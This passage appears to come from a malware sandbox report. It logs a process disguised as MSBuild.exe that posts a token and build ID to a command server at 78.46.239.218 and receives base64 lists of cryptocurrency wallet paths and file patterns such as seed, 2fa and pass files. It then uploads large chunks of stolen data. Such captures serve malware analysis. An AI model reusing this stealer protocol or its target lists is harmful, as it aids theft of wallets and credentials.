6f 6e 74 Data Ascii: ------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------CAKKEGDGCGDAKEBFIJECCont
2024-08-10 14:13:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49789	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:02 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:02 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------FHDAFIIDAKJDGDHIDAKJCont
2024-08-10 14:13:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49791	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:03 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHII User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:03 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------BGIIDAEBGCAAECAKFHIICont
2024-08-10 14:13:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:04 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49792	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:06 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:06 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 49 45 47 49 44 48 43 42 46 49 44 48 4a 44 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 45 47 49 44 48 43 42 46 49 44 48 4a 44 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 45 47 49 44 48 43 42 46 49 44 48 4a 44 47 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------BGIIEGIDHCBFIDHJDGDBContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------BGIIEGIDHCBFIDHJDGDBContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------BGIIEGIDHCBFIDHJDGDBCont
2024-08-10 14:13:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:06 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49793	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:07 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:07 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------AAAEBAFBGIDHCBFHIECFCont
2024-08-10 14:13:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:08 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49794	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:09 UTC	305	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJEGDAKEHJECAKEGDHJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 457 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:09 UTC	457	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------GIJEGDAKEHJECAKEGDHJCont
2024-08-10 14:13:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:13:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-10 14:13:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49797	78.46.239.218	443	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:13:11 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 78.46.239.218 Content-Length: 131881 Connection: Keep-Alive Cache-Control: no-cache
2024-08-10 14:13:11 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 34 64 30 38 65 34 39 62 32 66 65 34 39 65 32 39 63 39 63 33 33 66 65 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 32 63 65 61 31 66 31 34 35 39 39 38 34 30 39 30 34 31 66 31 37 65 32 33 38 61 62 32 39 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------DHCAECGIEBKJKEBGDHDACont
2024-08-10 14:13:11 UTC	16355	OUT	Data Raw: 4d 35 2f 48 76 37 47 76 6d 63 35 78 55 33 55 39 68 5a 57 56 6e 35 6e 75 35 52 7a 55 35 65 30 70 37 75 36 31 2b 2f 39 44 31 58 2f 68 59 33 68 50 38 41 36 43 76 2f 41 4a 4c 79 2f 77 44 78 4e 62 65 6b 36 7a 70 2b 75 57 5a 75 39 4e 75 42 50 43 48 4b 46 67 70 58 44 44 42 78 67 67 48 75 4b 38 4e 38 52 65 48 37 4c 77 39 70 4f 6e 52 7a 53 7a 74 72 56 77 6e 6e 54 78 62 68 73 68 51 35 77 4d 59 7a 75 2f 48 73 66 61 75 32 2b 47 31 7a 65 32 76 67 75 34 65 77 30 2f 37 62 4b 64 52 59 47 50 7a 6c 6a 77 76 6c 70 7a 6b 2f 68 78 37 31 34 69 6b 37 32 5a 39 42 52 78 64 52 31 4f 53 6f 6c 74 30 75 64 52 4c 61 4e 4c 70 31 7a 70 74 35 6f 39 31 63 78 50 50 4e 49 48 6a 65 4c 47 47 6b 5a 6c 49 33 4f 43 43 41 77 37 56 35 68 71 2b 6c 58 47 6b 58 35 74 72 69 4e 34 39 77 33 78 37 79 75 Data Ascii: M5/Hv7Gvmc5xU3U9hZWVn5nu5RzU5e0p7u61+/9D1X/hY3hP8A6Cv/AJLy/wDxNbek6zp+uWZu9NuBPCHKFgpXDDBxggHuK8N8ReH7Lw9pOnRzSztrVwnnTxbhshQ5wMYzu/Hsfau2+G1ze2vgu4ew0/7bKdRYGPzljwvlpzk/hx714ik72Z9BRxdR1OSolt0udRLaNLp1zpt5o91cxPPNIHjeLGGkZlI3OCCAw7V5hq+lXGkX5triN49w3x7yu
2024-08-10 14:13:11 UTC	16355	OUT	Data Raw: 2f 50 35 71 50 38 41 33 38 54 2f 41 4f 49 6f 2f 74 65 68 35 68 2f 59 57 4a 38 76 76 2f 34 42 35 58 76 70 4e 39 65 71 2f 77 44 43 72 64 45 2f 35 2f 4e 52 2f 77 43 2f 69 66 38 41 78 46 4a 2f 77 71 33 52 50 2b 66 7a 55 66 38 41 76 34 6e 2f 41 4d 52 52 2f 62 46 44 7a 48 2f 59 57 4a 38 76 76 50 4b 39 39 47 2b 76 56 50 38 41 68 56 75 69 66 38 2f 6d 6f 2f 38 41 66 78 50 2f 41 49 69 6a 2f 68 56 75 69 66 38 41 50 35 71 50 2f 66 78 50 2f 69 4b 66 39 73 55 50 4d 50 37 43 78 50 6c 39 35 35 56 76 6f 33 31 36 72 2f 77 71 33 52 50 2b 66 7a 55 66 2b 2f 69 66 2f 45 55 66 38 4b 73 30 54 2f 6e 38 31 48 2f 76 34 6e 2f 78 46 48 39 73 55 50 4d 50 37 43 78 50 6c 39 35 35 56 76 6f 33 31 36 72 2f 41 4d 4b 73 30 54 2f 6e 38 31 48 2f 41 4c 2b 4a 2f 77 44 45 55 66 38 41 43 72 4e 45 Data Ascii: /P5qP8A38T/AOIo/teh5h/YWJ8vv/4B5XvpN9eq/wDCrdE/5/NR/wC/if8AxFJ/wq3RP+fzUf8Av4n/AMRR/bFDzH/YWJ8vvPK99G+vVP8AhVuif8/mo/8AfxP/AIij/hVuif8AP5qP/fxP/iKf9sUPMP7CxPl955Vvo316r/wq3RP+fzUf+/if/EUf8Ks0T/n81H/v4n/xFH9sUPMP7CxPl955Vvo316r/AMKs0T/n81H/AL+J/wDEUf8ACrNE
2024-08-10 14:13:11 UTC	16355	OUT	Data Raw: 55 41 4a 52 6d 69 69 67 59 75 63 30 55 6c 46 41 42 53 30 6c 4c 54 41 4b 44 52 53 55 41 46 46 46 46 4d 59 5a 70 61 53 69 67 51 74 46 47 61 4b 41 44 70 52 52 52 6d 6d 4d 44 52 52 53 47 67 42 61 4b 53 6c 6f 41 4b 4b 4b 4d 30 41 4b 4f 61 4b 51 55 75 61 41 43 67 30 55 55 67 43 69 6b 70 61 42 43 30 6d 4b 50 70 53 6d 6b 41 6d 44 53 34 34 6f 6f 70 67 41 48 74 52 69 69 69 6b 41 6d 4d 30 62 63 55 36 6c 6f 75 77 47 34 70 43 4f 6c 4f 78 78 51 42 6e 69 6c 63 4c 6a 4d 65 68 70 43 6d 52 30 2f 47 72 43 57 38 7a 2f 41 48 59 5a 44 39 46 4e 57 55 30 69 38 63 66 36 6e 62 2f 76 4d 42 55 75 72 46 62 73 4f 61 78 6c 6d 4c 30 4e 52 6d 49 2b 6c 62 77 30 53 59 44 39 35 63 51 70 39 57 70 34 30 69 31 54 2f 57 58 68 50 2b 34 74 4c 36 31 42 64 52 2b 31 73 63 30 30 5a 4e 4d 4b 6b 66 53 Data Ascii: UAJRmiigYuc0UlFABS0lLTAKDRSUAFFFFMYZpaSigQtFGaKADpRRRmmMDRRSGgBaKSloAKKKM0AKOaKQUuaACg0UUgCikpaBC0mKPpSmkAmDS44oopgAHtRiiikAmM0bcU6louwG4pCOlOxxQBnilcLjMehpCmR0/GrCW8z/AHYZD9FNWU0i8cf6nb/vMBUurFbsOaxlmL0NRmI+lbw0SYD95cQp9Wp40i1T/WXhP+4tL61BdR+1sc00ZNMKkfS
2024-08-10 14:13:11 UTC	16355	OUT	Data Raw: 6f 71 68 2f 62 4e 68 2f 7a 31 66 38 41 37 38 76 2f 41 49 55 66 32 7a 59 66 38 39 58 2f 41 4f 2f 4c 2f 77 43 46 5a 47 35 66 6f 72 4a 75 2f 45 75 6b 32 4e 71 39 7a 64 58 4c 52 51 70 6a 63 35 68 66 41 79 63 44 74 36 6d 71 66 2f 43 63 2b 47 2f 2b 67 6c 2f 35 42 6b 2f 2b 4a 71 6f 77 6c 50 53 4b 75 54 4f 63 61 61 54 6d 37 4a 39 2f 36 38 7a 6f 71 4b 35 37 2f 68 4f 66 44 6e 2f 51 53 2f 38 41 49 4d 6e 2f 41 4d 54 53 66 38 4a 7a 34 62 2f 36 43 58 2f 6b 47 54 2f 34 6d 72 39 68 56 2f 6c 66 33 47 58 31 6d 68 2f 4f 76 76 52 30 56 46 63 37 2f 77 41 4a 7a 34 62 2f 41 4f 67 6c 2f 77 43 51 5a 50 38 41 34 6d 6a 2f 41 49 54 6e 77 33 2f 30 45 76 38 41 79 44 4a 2f 38 54 52 37 43 72 2f 4b 2f 75 44 36 7a 51 2f 6e 58 33 6f 36 4b 69 75 64 2f 77 43 45 35 38 4e 2f 39 42 49 66 39 2b Data Ascii: oqh/bNh/z1f8A78v/AIUf2zYf89X/AO/L/wCFZG5forJu/Euk2Nq9zdXLRQpjc5hfAycDt6mqf/Cc+G/+gl/5Bk/+JqowlPSKuTOcaaTm7J9/68zoqK57/hOfDn/QS/8AIMn/AMTSf8Jz4b/6CX/kGT/4mr9hV/lf3GX1mh/OvvR0VFc7/wAJz4b/AOgl/wCQZP8A4mj/AITnw3/0Ev8AyDJ/8TR7Cr/K/uD6zQ/nX3o6Kiud/wCE58N/9BIf9+
2024-08-10 14:13:11 UTC	16355	OUT	Data Raw: 6f 72 48 30 33 78 46 65 79 32 6e 68 70 5a 37 58 54 6d 4e 37 72 59 73 35 7a 39 68 68 42 61 49 43 4c 6a 4f 7a 50 38 54 63 39 65 65 74 55 6f 4e 63 6c 76 74 45 6d 46 67 62 4e 58 74 46 6d 4e 39 42 50 43 76 6e 48 62 49 66 33 30 55 68 48 33 51 70 58 4b 68 6c 49 32 6e 35 53 4d 6d 6a 2b 31 59 63 33 4c 79 2f 31 2f 54 44 2f 56 2b 6f 34 63 36 6e 2f 57 76 6e 35 48 53 30 6c 59 57 73 61 6a 65 52 72 72 4e 6a 62 32 39 70 48 62 57 4d 72 51 49 5a 49 31 4d 7a 37 54 6a 7a 44 4a 6a 64 6b 2f 65 34 4f 4f 63 59 78 57 74 71 6c 30 4a 39 66 75 4e 4f 6a 6d 73 4a 49 55 31 75 43 30 4c 57 4d 41 67 65 79 6a 66 63 4e 73 68 4b 4c 76 4c 48 41 42 47 38 41 71 63 6b 5a 41 4e 53 7a 53 45 56 46 75 4f 6b 74 76 76 53 2f 55 69 47 52 56 4a 38 79 6a 4e 58 6a 76 36 32 75 54 30 56 6a 36 64 71 31 33 71 Data Ascii: orH03xFey2nhpZ7XTmN7rYs5z9hhBaICLjOzP8Tc9eetUoNclvtEmFgbNXtFmN9BPCvnHbIf30UhH3QpXKhlI2n5SMmj+1Yc3Ly/1/TD/V+o4c6n/Wvn5HS0lYWsajeRrrNjb29pHbWMrQIZI1Mz7TjzDJjdk/e4OOcYxWtql0J9fuNOjmsJIU1uC0LWMAgeyjfcNshKLvLHABG8AqckZANSzSEVFuOktvvS/UiGRVJ8yjNXjv62uT0Vj6dq13q
2024-08-10 14:13:11 UTC	16355	OUT	Data Raw: 6e 2f 43 4a 45 4d 56 61 38 49 49 36 67 78 66 2f 58 72 7a 63 56 6d 32 44 77 6b 2f 5a 31 70 32 66 6f 33 2b 53 50 53 77 75 55 59 33 46 30 2f 61 55 59 58 58 71 6c 2b 62 4f 61 6f 72 71 42 34 50 7a 2f 79 2f 2f 77 44 6b 48 2f 37 4b 6f 4e 53 38 4d 66 32 66 70 30 74 33 39 73 38 7a 79 38 66 4c 35 57 4d 35 49 48 58 50 76 57 56 4c 50 63 76 71 7a 56 4f 46 53 37 62 73 74 4a 62 76 35 47 74 58 49 63 77 70 51 64 53 64 4f 79 53 75 39 59 37 4c 35 6e 50 55 55 55 56 36 35 35 41 55 55 55 55 41 46 46 46 56 74 52 6c 65 47 77 6c 64 44 68 67 41 41 66 54 4a 78 57 56 65 71 71 4e 4b 56 57 57 30 55 33 39 78 30 34 4c 43 7a 78 65 4a 70 34 61 47 38 35 4b 4b 39 57 37 46 6d 69 76 51 4c 58 34 62 65 47 34 72 57 4e 4c 6d 7a 61 35 6e 43 6a 66 4b 30 38 67 4c 48 75 63 42 67 4b 6d 2f 34 56 31 34 Data Ascii: n/CJEMVa8II6gxf/XrzcVm2Dwk/Z1p2fo3+SPSwuUY3F0/aUYXXql+bOaorqB4Pz/y//wDkH/7KoNS8Mf2fp0t39s8zy8fL5WM5IHXPvWVLPcvqzVOFS7bstJbv5GtXIcwpQdSdOySu9Y7L5nPUUUV655AUUUUAFFFVtRleGwldDhgAAfTJxWVeqqNKVWW0U39x04LCzxeJp4aG85KK9W7FmivQLX4beG4rWNLmza5nCjfK08gLHucBgKm/4V14
2024-08-10 14:13:11 UTC	16355	OUT	Data Raw: 51 38 30 55 48 6d 69 67 6f 54 50 46 4a 31 70 54 53 55 44 43 6b 70 61 62 51 41 55 64 36 57 6b 36 55 44 45 6f 6f 36 55 5a 6f 47 49 61 53 6c 7a 53 48 2f 38 41 56 51 4d 4b 53 6a 33 6f 50 57 67 59 64 71 54 72 51 61 4f 2f 57 67 41 2f 7a 31 70 4d 2f 77 43 54 51 61 4b 43 68 4b 44 2b 56 48 61 67 64 71 41 44 50 58 4e 49 54 39 54 52 6e 6d 6a 4e 41 78 4d 59 37 30 55 76 36 2b 2b 4b 51 55 44 45 37 30 47 67 47 69 67 41 50 57 6b 7a 51 4f 74 42 36 55 44 50 51 36 57 6d 46 73 62 50 6c 63 37 33 38 74 43 46 4a 33 50 78 38 6f 39 54 79 4f 50 65 6e 4e 6c 56 6c 4c 49 34 45 4a 78 4c 6c 44 38 68 7a 6a 35 76 54 6e 6a 6d 73 75 65 50 63 2b 56 39 6e 4f 31 37 4d 6d 74 37 6d 61 30 6e 57 61 43 51 70 49 70 